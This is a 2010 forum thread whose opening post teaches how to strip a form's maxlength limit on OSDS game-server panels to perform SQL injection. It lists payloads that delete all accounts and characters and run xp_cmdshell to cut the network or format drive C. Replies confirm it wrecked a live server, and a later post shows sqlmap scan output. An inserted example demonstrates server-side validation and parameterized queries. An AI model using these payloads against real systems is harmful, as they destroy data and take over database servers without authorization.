[Tutorial]How to SQL inject into a server with OSDS

#1 Zombe

This is a nice trick how to bypass janvier's anti-sql-injection, that he put into OSDS in just a few steps.

First, get .
Find a server that has an OSDS control panel and go to the panel login page.
Now, janvier's anti-sql-injection comes in. You can't write more than 12 letters, so you can't inject anything decent...
So here's what we do. Press Ctrl+U to open up the source code and press Ctrl+F to open up search in the source code. Search for "maxlength" (without the quotes). You will come to something like
HTML Code:
maxlength='12'
So delete that parameter.
Not the whole input, just the maxlength parameter, so the line
HTML Code:
<input type='text' name='accname' maxlength='12' />
should look like
HTML Code:
<input type='text' name='accname' />
Then, press "Apply Changes" at the top, and close the source code tab.
Hooray! We can write as long as we want ^^

And from now on, we inject the same way as we would normally.
Note: After the page is refreshed, you have to remove maxlength again.

After you inject, you should see a screen like this:

A few good injections:
Code:
a' DELETE FROM character..user_character--
(Deletes all characters)
Code:
a' DELETE FROM account..Tbl_user DELETE FROM character..USER_PROFILE--
(Deletes all accounts)

And for the more drastic ones:
Code:
a' exec master..xp_cmdshell 'ipconfig /release'--
(Disconnects the internet from the server)
Code:
a' exec master..xp_cmdshell 'format "C:/"'--
(Formats drive C)

Janvier, I hope your CMS is protected a little better... Haven't tried it on CMS yet.

IMPORTANT:
SQL injections are illegal, and if you do so, you do so on your own free will, knowing that legal action may be taken.
This tutorial's maker does not take any blame for the damage this may have caused. If users are to use this, they do so on their own will. This tutorial was made for teaching purposes only. User discretion is advised.
Thanks
10 Users
#2 draegon71, 02/04/2010, 14:01

Thank you Zombe for your awesome tutorial. You deserve much more than a big Thanks.
Remember, this is illegal so don't abuse too much ...
Vote for sticky.
[x]Ruin every thread made by janvier123
#3 Zombe, 02/04/2010, 14:09
Quote (originally posted by draegon71):
[x]Ruin every thread made by janvier123
Well, that goal is just a joke, but honestly, it made me laugh now
#4 pieter, 02/04/2010, 14:11
thanks for not using the format thing yet zombe!

removing osds now
#5 Zombe, 02/04/2010, 14:12
Quote (originally posted by pieter):
thanks for not using the format thing yet zombe!

removing osds now
Lol, sry for ur server. I was just testing, didn't really think janvier's protection was so weak, I was 95% sure it won't work... Sorry for ur server, RLY sorry...
If anything, I can DEV for u a while to help you get your players back.

I'll also make a tutorial on how to prevent SQL injections. But I have to think of a decent way myself first.
#6 pieter, 02/04/2010, 14:15
I'm running it on leeched files, it wouldn't be honest to ask u to dev on other person's files

oh and i backup all databases every 30 minutes, because i didn't trust the 1click

it's a fun server nothing big or commercial lol, still thanks for the advertising lol
#7 Zombe, 02/04/2010, 14:34
Quote (originally posted by pieter):
I'm running it on leeched files, it wouldn't be honest to ask u to dev on other person's files

oh and i backup all databases every 30 minutes, because i didn't trust the 1click

it's a fun server nothing big or commercial lol, still thanks for the advertising lol
****, didn't think about advertising... Forgot to blur the link >_>
I'll do that in a little while.
#8 pieter, 02/04/2010, 14:49
awww. and i was about to hit report on you _O-

nah it's back up, disabled osds and registration for the time being (had the same bug)
#9 janvier123, 02/04/2010, 15:54
i hate you now zombe
#10 Zombe, 02/04/2010, 16:04
Quote (originally posted by janvier123):
i hate you now zombe
Just add some protection, like preparing queries, etc ^^
You should thank me for pointing out ur mistake
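The two server-side controls this thread turns on, the length limit that `maxlength='12'` only suggests to the browser and the prepared queries mentioned in post #10, shown as an added example that is not OSDS code and not from any poster. It assumes a hypothetical `tbl_user` table and uses Python's `sqlite3` as a stand-in database; the posted value is constructed.

```python
import re
import sqlite3

# Hypothetical rule: the 12-character limit the form advertises, enforced
# where the client cannot edit it, plus an allow-list of characters.
ACCNAME_RE = re.compile(r"[A-Za-z0-9_]{1,12}")


def make_db():
    """Constructed sample data; sqlite3 stands in for the real database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbl_user (accname TEXT PRIMARY KEY)")
    db.execute("INSERT INTO tbl_user VALUES ('alice')")
    return db


def lookup_concatenated(db, accname):
    """'Before': the posted value is pasted into the SQL text."""
    sql = "SELECT accname FROM tbl_user WHERE accname = '" + accname + "'"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # The input was parsed as SQL instead of being handled as a value.
        return "parsed as SQL: %s" % exc


def bound_without_validation(db, accname):
    """Binding alone already keeps the value out of the SQL text."""
    return db.execute(
        "SELECT accname FROM tbl_user WHERE accname = ?", (accname,)
    ).fetchall()


def lookup_bound(db, accname):
    """'After': validate on the server, then bind the value as a parameter."""
    if not isinstance(accname, str) or not ACCNAME_RE.fullmatch(accname):
        return None  # rejected before any query runs
    return bound_without_validation(db, accname)


if __name__ == "__main__":
    db = make_db()
    # Constructed input: longer than 12 characters and containing a quote,
    # i.e. what the server receives once maxlength is gone from the form.
    posted = "o'brien_longer_than_twelve"
    print(lookup_concatenated(db, posted))
    print(bound_without_validation(db, posted))
    print(lookup_bound(db, posted), lookup_bound(db, "alice"))
```

The concatenated lookup fails inside the SQL parser, which shows the value reached it as code; the bound lookup returns no rows for the same value, and the validated path rejects it before touching the database.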
#11 EliteWarrior, 02/04/2010, 23:58
Well good job to Zombe, but i already knew it was vulnerable to sql injection. Try to perfect your script janvier123, this is the main reason I'm not using it.
#12 ҉ THT ҉, 02/05/2010, 00:56
This mean; OSDS = DIE
Thanks to zombie xD LOL
#13 Zombe, 02/05/2010, 07:58
Tested and works on CMS ^^
#14 janvier123, 02/05/2010, 10:23
Analysing URL [/dkcms/V0.1/?dkcms=main]

[+] working on dkcms
[+] Method: MS-SQL error message
[+] Method: SQL error message
[+] Method: MySQL comment injection
[+] Method: SQL Blind Statement Injection
[+] Method: SQL Blind String Injection
--- No results here means that SQLiX found no injection point ---


--- Now sqlmap will test your url ---

[*] starting at: 09:21:09

[09:21:09] [INFO] testing connection to the target url
[09:21:10] [INFO] testing if the url is stable, wait a few seconds
[09:21:14] [INFO] url is stable
[09:21:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[09:21:15] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[09:21:15] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
[09:21:16] [WARNING] Cookie parameter 'PHPSESSID' is not dynamic
[09:21:16] [INFO] testing if GET parameter 'dkcms' is dynamic
[09:21:18] [INFO] confirming that GET parameter 'dkcms' is dynamic
[09:21:20] [INFO] GET parameter 'dkcms' is dynamic
[09:21:20] [INFO] testing sql injection on GET parameter 'dkcms' with 0 parenthesis
[09:21:20] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:21] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:21] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:22] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:22] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:24] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:24] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:25] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:25] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:26] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:26] [INFO] GET parameter 'dkcms' is not injectable with 0 parenthesis
[09:21:26] [INFO] testing sql injection on GET parameter 'dkcms' with 1 parenthesis
[09:21:26] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:27] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:27] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:29] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:29] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:30] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:30] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:31] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:31] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:32] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:32] [INFO] GET parameter 'dkcms' is not injectable with 1 parenthesis
[09:21:32] [INFO] testing sql injection on GET parameter 'dkcms' with 2 parenthesis
[09:21:32] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:34] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:34] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:35] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:35] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:36] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:36] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:37] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:37] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:38] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:38] [INFO] GET parameter 'dkcms' is not injectable with 2 parenthesis
[09:21:38] [INFO] testing sql injection on GET parameter 'dkcms' with 3 parenthesis
[09:21:38] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:40] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:40] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:41] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:41] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:42] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:42] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:43] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:43] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:45] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:45] [INFO] GET parameter 'dkcms' is not injectable with 3 parenthesis
[09:21:45] [WARNING] GET parameter 'dkcms' is not injectable


Too bad zombe,
#15 draegon71, 02/05/2010, 12:30
yep is working at dkcms too ... FAIL
I Tested at my server ^^